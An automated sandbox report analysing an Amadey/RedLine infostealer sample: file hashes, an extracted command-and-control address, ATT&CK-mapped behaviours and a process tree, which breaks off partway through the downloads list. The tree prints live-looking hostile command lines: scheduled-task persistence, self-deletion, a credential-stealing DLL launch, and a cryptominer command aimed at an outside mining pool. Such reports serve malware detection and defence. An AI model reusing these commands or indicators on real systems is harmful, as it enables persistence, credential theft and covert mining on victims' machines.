amadey | 69edc6ac8ec6560de132ec0d7243abcdd3734fc6ea94026aa027096c64f1c819

Analysis

max time kernel
149s
max time network
141s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
01-11-2022 16:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

69edc6ac8ec6560de132ec0d7243abcdd3734fc6ea94026aa027096c64f1c819.exe
Size

319KB
MD5

10ede4cd981030348cd6ba5fe1903a6b
SHA1

6068ff7ec1ae97c1b1b19b8c81fdd191102d365c
SHA256

69edc6ac8ec6560de132ec0d7243abcdd3734fc6ea94026aa027096c64f1c819
SHA512

e34eaa5dba3077f45b54264a2e2f6196ba0d425c39db6db0fc3f994a326499933c16558caf6d8f02d9654eb411988b1884e1def95a40f35c8fcbc522201771ef
SSDEEP

6144:UVZG84i8N5wZ55DQ7xGC5Q/vXe27ITsqe:UVZG+05o55MxK//7

Score

10^/10

amadey redline google2 collection infostealer spyware stealer trojan upx

Malware Config

Extracted

Family

redline

Botnet

Google2

167.235.71.14:20469

Attributes

auth_value
fb274d9691235ba015830da570a13578

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect Amadey credential stealer module 2 IoCs

resource	yara_rule
behavioral1/files/0x000200000001557d-1224.dat	amadey_cred_module
behavioral1/files/0x000200000001557d-1223.dat	amadey_cred_module

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral1/memory/1584-182-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline
behavioral1/memory/1584-187-0x00000000004221AE-mapping.dmp	family_redline

Blocklisted process makes network request 1 IoCs

flow	pid	Process
18	4328	rundll32.exe

Downloads MZ/PE file

Executes dropped EXE 8 IoCs

pid	Process
3968	1993.exe
3312	2C41.exe
1852	ubCKsAUBHChhUECKCUSECFsUHShuCFSHhCFChHACHScABCCHACaFefF.exe
4584	31D0.exe
3308	39B0.exe
4916	LYKAA.exe
4920	rovwer.exe
3892	rovwer.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000800000001ac11-234.dat	upx
behavioral1/files/0x000800000001ac11-235.dat	upx
behavioral1/memory/4584-238-0x0000000000B00000-0x00000000012E9000-memory.dmp	upx
behavioral1/memory/4584-249-0x0000000000B00000-0x00000000012E9000-memory.dmp	upx

Deletes itself 1 IoCs

pid	Process
2616	Process not Found

Loads dropped DLL 1 IoCs

pid	Process
4328	rundll32.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	rundll32.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3968 set thread context of 1584	3968	1993.exe	68
PID 4916 set thread context of 3252	4916	LYKAA.exe	95

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	69edc6ac8ec6560de132ec0d7243abcdd3734fc6ea94026aa027096c64f1c819.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	69edc6ac8ec6560de132ec0d7243abcdd3734fc6ea94026aa027096c64f1c819.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	69edc6ac8ec6560de132ec0d7243abcdd3734fc6ea94026aa027096c64f1c819.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4260	schtasks.exe
4652	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4304	timeout.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	31D0.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b660537f000000010000000e000000300c060a2b0601040182370a03047e000000010000000800000000c001b39667d601030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	31D0.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c137e000000010000000800000000c001b39667d6017f000000010000000e000000300c060a2b0601040182370a03041d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589100b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000006200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd6770739090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	31D0.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2796	69edc6ac8ec6560de132ec0d7243abcdd3734fc6ea94026aa027096c64f1c819.exe
2796	69edc6ac8ec6560de132ec0d7243abcdd3734fc6ea94026aa027096c64f1c819.exe
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2616	Process not Found

Suspicious behavior: MapViewOfSection 19 IoCs

pid	Process
2796	69edc6ac8ec6560de132ec0d7243abcdd3734fc6ea94026aa027096c64f1c819.exe
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found
2616	Process not Found

Suspicious use of AdjustPrivilegeToken 61 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeDebugPrivilege	1852	ubCKsAUBHChhUECKCUSECFsUHShuCFSHhCFChHACHScABCCHACaFefF.exe
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeDebugPrivilege	4916	LYKAA.exe
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeDebugPrivilege	1584	vbc.exe
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found
Token: SeShutdownPrivilege	2616	Process not Found
Token: SeCreatePagefilePrivilege	2616	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2616 wrote to memory of 3968	2616	Process not Found	66
PID 2616 wrote to memory of 3968	2616	Process not Found	66
PID 2616 wrote to memory of 3968	2616	Process not Found	66
PID 3968 wrote to memory of 1584	3968	1993.exe	68
PID 3968 wrote to memory of 1584	3968	1993.exe	68
PID 3968 wrote to memory of 1584	3968	1993.exe	68
PID 3968 wrote to memory of 1584	3968	1993.exe	68
PID 3968 wrote to memory of 1584	3968	1993.exe	68
PID 2616 wrote to memory of 3312	2616	Process not Found	69
PID 2616 wrote to memory of 3312	2616	Process not Found	69
PID 3312 wrote to memory of 1852	3312	2C41.exe	70
PID 3312 wrote to memory of 1852	3312	2C41.exe	70
PID 2616 wrote to memory of 4584	2616	Process not Found	71
PID 2616 wrote to memory of 4584	2616	Process not Found	71
PID 1852 wrote to memory of 428	1852	ubCKsAUBHChhUECKCUSECFsUHShuCFSHhCFChHACHScABCCHACaFefF.exe	72
PID 1852 wrote to memory of 428	1852	ubCKsAUBHChhUECKCUSECFsUHShuCFSHhCFChHACHScABCCHACaFefF.exe	72
PID 428 wrote to memory of 4304	428	cmd.exe	74
PID 428 wrote to memory of 4304	428	cmd.exe	74
PID 4584 wrote to memory of 4020	4584	31D0.exe	75
PID 4584 wrote to memory of 4020	4584	31D0.exe	75
PID 2616 wrote to memory of 3308	2616	Process not Found	77
PID 2616 wrote to memory of 3308	2616	Process not Found	77
PID 2616 wrote to memory of 3308	2616	Process not Found	77
PID 2616 wrote to memory of 4520	2616	Process not Found	78
PID 2616 wrote to memory of 4520	2616	Process not Found	78
PID 2616 wrote to memory of 4520	2616	Process not Found	78
PID 2616 wrote to memory of 4520	2616	Process not Found	78
PID 2616 wrote to memory of 4756	2616	Process not Found	79
PID 2616 wrote to memory of 4756	2616	Process not Found	79
PID 2616 wrote to memory of 4756	2616	Process not Found	79
PID 2616 wrote to memory of 3112	2616	Process not Found	80
PID 2616 wrote to memory of 3112	2616	Process not Found	80
PID 2616 wrote to memory of 3112	2616	Process not Found	80
PID 2616 wrote to memory of 3112	2616	Process not Found	80
PID 2616 wrote to memory of 552	2616	Process not Found	81
PID 2616 wrote to memory of 552	2616	Process not Found	81
PID 2616 wrote to memory of 552	2616	Process not Found	81
PID 428 wrote to memory of 4916	428	cmd.exe	82
PID 428 wrote to memory of 4916	428	cmd.exe	82
PID 2616 wrote to memory of 1080	2616	Process not Found	83
PID 2616 wrote to memory of 1080	2616	Process not Found	83
PID 2616 wrote to memory of 1080	2616	Process not Found	83
PID 2616 wrote to memory of 1080	2616	Process not Found	83
PID 4916 wrote to memory of 2276	4916	LYKAA.exe	84
PID 4916 wrote to memory of 2276	4916	LYKAA.exe	84
PID 2616 wrote to memory of 4924	2616	Process not Found	86
PID 2616 wrote to memory of 4924	2616	Process not Found	86
PID 2616 wrote to memory of 4924	2616	Process not Found	86
PID 2616 wrote to memory of 4924	2616	Process not Found	86
PID 2616 wrote to memory of 316	2616	Process not Found	88
PID 2616 wrote to memory of 316	2616	Process not Found	88
PID 2616 wrote to memory of 316	2616	Process not Found	88
PID 2616 wrote to memory of 316	2616	Process not Found	88
PID 2616 wrote to memory of 2952	2616	Process not Found	89
PID 2616 wrote to memory of 2952	2616	Process not Found	89
PID 2616 wrote to memory of 2952	2616	Process not Found	89
PID 2616 wrote to memory of 3708	2616	Process not Found	90
PID 2616 wrote to memory of 3708	2616	Process not Found	90
PID 2616 wrote to memory of 3708	2616	Process not Found	90
PID 2616 wrote to memory of 3708	2616	Process not Found	90
PID 2276 wrote to memory of 4260	2276	cmd.exe	91
PID 2276 wrote to memory of 4260	2276	cmd.exe	91
PID 3308 wrote to memory of 4920	3308	39B0.exe	92
PID 3308 wrote to memory of 4920	3308	39B0.exe	92

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	rundll32.exe

C:\Users\Admin\AppData\Local\Temp\69edc6ac8ec6560de132ec0d7243abcdd3734fc6ea94026aa027096c64f1c819.exe
"C:\Users\Admin\AppData\Local\Temp\69edc6ac8ec6560de132ec0d7243abcdd3734fc6ea94026aa027096c64f1c819.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2796

C:\Users\Admin\AppData\Local\Temp\1993.exe
C:\Users\Admin\AppData\Local\Temp\1993.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3968
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1584

C:\Users\Admin\AppData\Local\Temp\2C41.exe
C:\Users\Admin\AppData\Local\Temp\2C41.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3312
- C:\Users\Admin\AppData\Roaming\ubCKsAUBHChhUECKCUSECFsUHShuCFSHhCFChHACHScABCCHACaFefF.exe
  "C:\Users\Admin\AppData\Roaming\ubCKsAUBHChhUECKCUSECFsUHShuCFSHhCFChHACHScABCCHACaFefF.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp326A.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:428
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:4304
  - - C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe
      "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4916
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2276
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:4260
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RKsS6XcgidDNc8rU38Yiv5STQutyMUu9A4.installs002 -p hybrid -t 5
        5⤵
        
        PID:3252
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        6⤵
        
        PID:4872

C:\Users\Admin\AppData\Local\Temp\31D0.exe
C:\Users\Admin\AppData\Local\Temp\31D0.exe
1⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4584
- C:\Windows\system32\cmd.exe
  cmd.exe /c "del C:\Users\Admin\AppData\Local\Temp\31D0.exe"
  2⤵
  PID:4020

C:\Users\Admin\AppData\Local\Temp\39B0.exe
C:\Users\Admin\AppData\Local\Temp\39B0.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3308
- C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe
  "C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe"
  2⤵
  - Executes dropped EXE
  PID:4920
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:4652
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\80b59841e5c623\cred64.dll, Main
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Accesses Microsoft Outlook profiles
    - outlook_win_path
    PID:4328

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4520

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4756

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3112

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:552

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1080

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4924

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:316

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2952

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3708

C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe
C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe
1⤵
- Executes dropped EXE
PID:3892

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe

Filesize
836KB

MD5
1bbb1d9e17adaaad085bafb9e2e8c442

SHA1
35f4e43baf2927ea0dc39d1b172cfb80288936fa

SHA256
24944e8051ae3a2031c035c1b30a5e0f044d35ee71c4706aa615eb0039d3727b

SHA512
358314b132b0a433248fde530d77177dcab054006f209e7589251743fcd8f4cd8ebdae229c42e6b81ce8f256bde91f59233db1a83e324255fc8fb6ffe86df4e0

Download Submit
C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe

Filesize
836KB

MD5
1bbb1d9e17adaaad085bafb9e2e8c442

SHA1
35f4e43baf2927ea0dc39d1b172cfb80288936fa

SHA256
24944e8051ae3a2031c035c1b30a5e0f044d35ee71c4706aa615eb0039d3727b

SHA512
358314b132b0a433248fde530d77177dcab054006f209e7589251743fcd8f4cd8ebdae229c42e6b81ce8f256bde91f59233db1a83e324255fc8fb6ffe86df4e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\1993.exe

Filesize
285KB

MD5
9edea57ee228afa17f74920544ba3b4a

SHA1
7e9a1559905902411fe6cd554209e0e367c141a6

SHA256
b2475d46834d3f87203c4228012b839e7e7128b204de08fa9229abca7dd100d8

SHA512
f45483d8eadc8829e1e8ce49921b962bbbb55ec1280cbf2c453cbcb842a3dc0b3da44844afb8b84f2c57fdc42dccad8ebbfeb9a10dc0dac848cf3200e86b6ee1

Download Submit
C:\Users\Admin\AppData\Local\Temp\1993.exe

Filesize
285KB

MD5
9edea57ee228afa17f74920544ba3b4a

SHA1
7e9a1559905902411fe6cd554209e0e367c141a6

SHA256
b2475d46834d3f87203c4228012b839e7e7128b204de08fa9229abca7dd100d8

SHA512
f45483d8eadc8829e1e8ce49921b962bbbb55ec1280cbf2c453cbcb842a3dc0b3da44844afb8b84f2c57fdc42dccad8ebbfeb9a10dc0dac848cf3200e86b6ee1

Download Submit
C:\Users\Admin\AppData\Local\Temp\2C41.exe

Filesize
1.1MB

MD5
215faa5532b8182634fa8458e23157d8

SHA1
f141e4c5ee014fab8150ef4b312b9c230f3c059d

SHA256
d5f4ccfc78e9a8b65e0866988f5e21fdd0be3875b5603c0a15eb4f9d3182a6c8

SHA512
6ee039bb52130e956e47c6303b2d1876e6cf0b057c277b84579e060bc9a1e41a1b7a9ebd6703067e5d1c3d47112ec17be61b01cc80d79e55c58f5c03a801ffae

Download Submit
C:\Users\Admin\AppData\Local\Temp\2C41.exe

Filesize
1.1MB

MD5
215faa5532b8182634fa8458e23157d8

SHA1
f141e4c5ee014fab8150ef4b312b9c230f3c059d

SHA256
d5f4ccfc78e9a8b65e0866988f5e21fdd0be3875b5603c0a15eb4f9d3182a6c8

SHA512
6ee039bb52130e956e47c6303b2d1876e6cf0b057c277b84579e060bc9a1e41a1b7a9ebd6703067e5d1c3d47112ec17be61b01cc80d79e55c58f5c03a801ffae

Download Submit
C:\Users\Admin\AppData\Local\Temp\31D0.exe

Filesize
2.8MB

MD5
e654228f62c81cfa6da658858a46ccff

SHA1
6926e074d206a7f1bdab2a5c4f374c75338a4a93

SHA256
e22ad0212d094263e07e449bb8370760dbeed1a89ad76b485ea7f072694d4003

SHA512
bd2dbe69fc707b3090625af3a7dd226060712f2185a0ffdfa9229ccca085e4159b3832cb0ac45c9d80cd3f8521a89164a150966fbbee210c984e24ffb4b75a0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\31D0.exe

Filesize
2.8MB

MD5
e654228f62c81cfa6da658858a46ccff

SHA1
6926e074d206a7f1bdab2a5c4f374c75338a4a93

SHA256
e22ad0212d094263e07e449bb8370760dbeed1a89ad76b485ea7f072694d4003

SHA512
bd2dbe69fc707b3090625af3a7dd226060712f2185a0ffdfa9229ccca085e4159b3832cb0ac45c9d80cd3f8521a89164a150966fbbee210c984e24ffb4b75a0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\39B0.exe

Filesize
358KB

MD5
59025eadba16668c5a34e389d1de1e18

SHA1
